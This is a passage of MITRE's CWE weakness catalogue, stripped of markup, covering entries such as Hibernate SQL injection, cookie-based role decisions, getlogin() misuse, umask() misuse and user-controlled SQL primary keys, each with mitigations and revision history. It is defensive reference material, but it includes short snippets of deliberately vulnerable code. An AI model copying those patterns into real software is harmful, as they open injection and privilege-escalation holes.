CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Misconfiguration: Password in Configuration File + + + + Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges. + The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration. + + + + + + Implementation + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Architecture and Design + Use the least privilege principle. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + ASP.NET Misconfiguration: Identity Impersonation + + + + The product uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values. + The getlogin() function returns a pointer to a string that contains the name of the user associated with the calling process. The function is not reentrant, meaning that if it is called from another process, the contents are not locked out and the value of the string can be changed by another process. This makes it very risky to use because the username can be changed by other processes, so the results of the function cannot be trusted. + + + + + + + + + + Implementation + + + + + Integrity + Access Control + Other + Modify Application Data + Bypass Protection Mechanism + Other + + + + + Architecture and Design + Using names for security purposes is not advised. Names are easy to forge and can have overlapping user IDs, potentially causing confusion or impersonation. + + + Implementation + Use getlogin_r() instead, which is reentrant, meaning that other processes are locked out from changing the username. + + + + + The following code relies on getlogin() to determine whether or not a user is trusted. It is easily subverted. + + pwd = getpwnam(getlogin());if (isTrustedGroup(pwd->pw_gid)) {allow();} else {deny();} + + + + + + Often Misused: Authentication + + + SFP3 + Use of an improper API + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Misused Authentication: getlogin() + + + + The product accepts path input in the form of asterisk wildcard ('filedir*') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2004-0696 + List directories using desired path and "*" + https://www.cve.org/CVERecord?id=CVE-2004-0696 + + + CVE-2002-0433 + List files in web server using "*.ext" + https://www.cve.org/CVERecord?id=CVE-2002-0433 + + + + + filedir* (asterisk / wildcard) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Asterisk Wildcard - filedir* + + + + The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod(). + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Read Files or Directories + Modify Files or Directories + Bypass Protection Mechanism + + + + + Implementation + Use umask() with the correct argument. + + + Testing + If you suspect misuse of umask(), you can use grep to spot call instances of umask(). + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Some umask() manual pages begin with the false statement: "umask sets the umask to mask & 0777" Although this behavior would better align with the usage of chmod(), where the user provided argument specifies the bits to enable on the specified file, the behavior of umask() is in fact opposite: umask() sets the umask to ~mask & 0777. The documentation goes on to describe the correct usage of umask(): "The umask is used by open() to set initial file permissions on a newly-created file. Specifically, permissions in the umask are turned off from the mode argument to open(2) (so, for example, the common umask default value of 022 results in new files being created with permissions 0666 & ~022 = 0644 = rw-r--r-- in the usual case where the mode is specified as 0666)." + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Other_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Often Misused: umask() + + + + The product contains dead code, which can never be executed. + Dead code is code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed. + + + + + + Indirect + + + + + + + + Implementation + + + + + Other + Quality Degradation + Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality. + + + Other + Reduce Maintainability + + + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Binary / Bytecode Quality Analysis + Compare binary / bytecode to application permission manifest + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Automated Monitored Execution + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Permission Manifest Analysis + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source Code Quality Analyzer + + Cost effective for partial coverage: + + Warning Flags + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + + + Implementation + Remove dead code before deploying the application. + + + Testing + Use a static analysis tool to spot dead code. + + + + + The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null, while on the only path where s can be assigned a non-null value there is a return statement. + + String s = null;if (b) {s = "Yes";return;} + if (s != null) {Dead();} + + + + In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code. + + public class DoubleDead {private void doTweedledee() {doTweedledumb();}private void doTweedledumb() {doTweedledee();}public static void main(String[] args) {System.out.println("running DoubleDead");}} + + (In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.) + + + The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant. + + public class Dead { + String glue; + public String getGlue() {return "glue";} + } + + + + + + CVE-2014-1266 + chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + + + MSC07-C + Detect and remove dead code + + + MSC00-PL + Detect and remove dead code + Exact + + + SFP2 + Unused Entities + + + ASCMM-MNT-20 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash. + Because local variables are allocated on the stack, when a program returns a pointer to a local variable, it is returning a stack address. A subsequent function call is likely to re-use this same stack address, thereby overwriting the value of the pointer, which no longer corresponds to the same variable since a function's stack frame is invalidated when it returns. At best this will cause the value of the pointer to change unexpectedly. In many cases it causes the program to crash the next time the pointer is dereferenced. + + + + + + + + Indirect + + + Primary + + + + + + + + + Implementation + + + + + Availability + Integrity + Confidentiality + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + If the returned stack buffer address is dereferenced after the return, then an attacker may be able to modify or read memory, depending on how the address is used. If the address is used for reading, then the address itself may be exposed, or the contents that the address points to. If the address is used for writing, this can lead to a crash and possibly code execution. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Testing + Use static analysis tools to spot return of the address of a stack variable. + + + + + The following function returns a stack address. + + char* getName() {char name[STR_MAX];fillInName(name);return name;} + + + + + + DCL30-C + Declare objects with appropriate storage durations + CWE More Specific + + + POS34-C + Do not call putenv() with a pointer to an automatic variable as the argument + + + SFP1 + Glitch in computation + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Stack Address Returned + + + + The variable's value is assigned but never used, making it a dead store. + After the assignment, the variable is either assigned another value or goes out of scope. It is likely that the variable is simply vestigial, but it is also possible that the unused variable points out a bug. + + + + + + Indirect + + + + + Unused Variable + + + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + This weakness could be an indication of a bug in the program or a deprecated variable that was not removed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Remove unused variables from the code. + + + + + The following code excerpt assigns to the variable r and then overwrites the value without using it. + + r = getName();r = getNewBuffer(buf); + + + + + + MSC00-C + Compile cleanly at high warning levels + + + MSC01-PL + Detect and remove unused variables + Imprecise + + + SFP2 + Unused Entities + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Description, Name, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Alternate_Terms, Name, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unused Variable + Assignment to Variable without Use ('Unused Variable') + + + + Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Requirements + A non-SQL style database which is not subject to this flaw may be chosen. + + + Architecture and Design + Follow the principle of least privilege when creating user accounts to a SQL database. Users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others' data. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Implement SQL strings using prepared statements that bind variables. Prepared statements that do not bind variables can be vulnerable to attack. + + + Implementation + Use vigorous allowlist style checking on any user input that may be used in a SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that have been entered in the database may neglect to escape meta-characters before use. Narrowly define the set of safe characters based on the expected value of the parameter in the request. + + + + + The following code excerpt uses Hibernate's HQL syntax to build a dynamic query that's vulnerable to SQL injection. + + String street = getStreetFromUser();Query query = session.createQuery("from Address a where a.street='" + street + "'"); + + + + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user. + Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Reliance on cookies without detailed validation and integrity checking can allow attackers to bypass authentication, conduct injection attacks such as SQL injection and cross-site scripting, or otherwise modify inputs in unexpected ways. + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + It is dangerous to use cookies to set a user's privileges. The cookie can be manipulated to escalate an attacker's privileges to an administrative level. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Avoid using cookie data for a security-related decision. + + + Implementation + Perform thorough input validation (i.e.: server side validation) on the cookie data if you're going to use it for a security related decision. + + + Architecture and Design + Add integrity checks to detect tampering. + + + Architecture and Design + Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client. + + + + + The following code excerpt reads a value from a browser cookie to determine the role of the user. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} + + It is easy for an attacker to modify the "role" value found in the locally stored cookie, allowing privilege escalation. + + + + + SFP29 + Faulty endpoint authentication + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks.. + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-07-16 + Critical + Clarified name and description; broadened the definition to include any security-critical operation, not just security decisions, to allow for relationships with injection weaknesses. + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Name, Potential_Mitigations, Relationship_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Use of Cookies + Use of Cookies in Security Decision + + + + The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor. + + When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records. + Database access control errors occur when: + + Data enters a program from an untrusted source. + The data is used to specify the value of a primary key in a SQL query. + The untrusted source does not have the permissions to be able to access all rows in the associated table. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Read Application Data + Modify Application Data + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an "accept known good" validation strategy. + + + Implementation + Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly. + + + + + The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user. + + ...conn = new SqlConnection(_ConnectionString);conn.Open();int16 id = System.Convert.ToInt16(invoiceID.Text);SqlCommand query = new SqlCommand( "SELECT * FROM invoices WHERE id = @id", conn);query.Parameters.AddWithValue("@id", id);SqlDataReader objReader = objCommand.ExecuteReader();... + + The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user. + + + + + SFP25 + Tainted input to variable + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Applicable_Platforms, Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Access Control Bypass Through User-Controlled SQL Primary Key + + + + The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes. + + Within servlets, shared static variables are not protected from concurrent access, but servlets are multithreaded. This is a typical programming mistake in J2EE applications, since the multithreading is handled by the framework. When a shared variable can be influenced by an attacker, one thread could wind up modifying the variable to contain data that is not valid for a different thread that is also using the data within the variable. + Note that this weakness is not unique to servlets. + + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Modify Application Data + DoS: Instability + 